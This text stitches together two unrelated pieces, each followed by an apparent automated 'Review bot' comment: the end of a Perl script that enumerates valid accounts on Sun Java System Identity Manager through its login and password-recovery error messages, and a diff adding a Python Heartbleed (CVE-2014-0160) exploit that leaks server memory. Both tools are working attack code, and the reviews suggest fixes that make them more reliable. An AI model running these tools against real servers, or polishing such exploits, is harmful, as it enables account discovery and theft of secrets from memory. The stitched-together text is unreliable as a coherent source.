my $url = 'https://'.$Server.':'.$Port.'/idm/login.jsp?id=&command=login&activeControl=&accountId='.$line.'&password=';
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
my $title = $response->title;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if($response->content =~ m{Invalid Account ID} ) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif ($response->content =~ m{Invalid Password} ) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
close(Userfile);
}
#IDM Recovery Feature
#https://oiawf02:8081/idm/questionLogin.jsp?accountId=owasp&lang=en&cntry=US
if ( $Switch eq "idm" ) {
open(Userfile) or die("Could not open file: $Userfile\n\n");
print "\n\n\n\nUsers enumeration Sun java System Identity Manager - Recovery Feature Analysis\n\n ";
foreach $line (<Userfile>) {
my $url = 'https://'.$Server.':'.$Port.'/idm/questionLogin.jsp?accountId='.$line;
my $browser = LWP::UserAgent->new;
my $response = $browser->get($url);
my @headers = $response->header_field_names;
my $title = $response->title;
#print "response headers: @headers\n";
$response->is_success or
die "Failed to GET '$url': ", $response->status_line, "\n Aborintg";
#print $response->as_string;
chomp($line);
# Analysis of response and title of web page received
if($response->content =~ m{The specified user was not found} ) {
# print $response->content;
# print "\n\n\n\n";
# print $response->title;
print "\n\tUser: $line not valid\n\n"}
elsif ($response->content =~ m{Too few user} ) {
print "\n\tUser: $line yeah ... Active user! \n\n"}
elsif ($response->content =~ m{Your account has been locked.} ) {
print "\n\tUser: $line Exist but Account has been locked\n\n"}
else {
print "\n\tUser: $line Active ???? Maybe you have to analizing the error message received \n\n"}
}
print "\n\n";
close(Userfile);
}
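Review bot: All three `open(Userfile)` calls use the one-argument form, which takes the path from the package variable `$Userfile` and parses it like a two-argument open, so a `-userfile` value that begins with `>` or ends with `|` is interpreted as a mode or a pipe rather than as a file name. A lexical handle with an explicit mode avoids that: `open(my $fh, '<', $Userfile) or die "Could not open file: $Userfile: $!\n";`, read with `<$fh>`. The script also runs without `use strict`: `my ($server, $user_file, $switch)` declares variables that are never used while `GetOptions` fills the undeclared globals `$Server`, `$Port` and `$Switch`, and `use Switch;` loads a module that nothing calls. For anyone maintaining an affected deployment, the distinct strings the script matches (`Invalid Account ID` versus `Invalid Password`, for example) are the behaviour to fix: the login and recovery pages should return the same response for known and unknown accounts.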


@ -0,0 +1,156 @@
# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]
# Date: [2014-04-09]
# Exploit Author: [Csaba Fitzl]
# Vendor Homepage: [http://www.openssl.org/]
# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]
# Version: [1.0.1f]
# Tested on: [N/A]
# CVE : [2014-0160]
#!/usr/bin/env python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by Csaba Fitzl for multiple SSL / TLS version support
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
version = []
version.append(['SSL 3.0','03 00'])
version.append(['TLS 1.0','03 01'])
version.append(['TLS 1.1','03 02'])
version.append(['TLS 1.2','03 03'])
def create_hello(version):
hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
return hello
def create_hb(version):
hb = h2bin('18 ' + version + ' 00 03 01 40 00')
return hb
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s,hb):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
for i in range(len(version)):
print 'Trying ' + version[i][0] + '...'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(create_hello(version[i][1]))
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(create_hb(version[i][1]))
if hit_hb(s,create_hb(version[i][1])):
#Stop if vulnerable
break
if __name__ == '__main__':
main()
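Review bot: In `main`, the `return` taken when `recvmsg` yields `typ == None` sits inside the `for i in range(len(version))` loop, so the first protocol version the server refuses ends the whole run and the remaining versions are never checked. A server that rejects SSL 3.0, the first entry in `version`, therefore produces no verdict at all, which is easy to misread as a pass when auditing your own hosts. Track the handshake outcome instead: set `hello_done = False` before the inner loop, set it to `True` only on the Server Hello Done branch, `break` on a closed connection, and follow the loop with `if not hello_done: s.close(); continue`. Each iteration also opens a socket that is never closed, and the `#!/usr/bin/env python` line comes after the header comments, so it is not on line 1 and has no effect when the file is executed directly.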
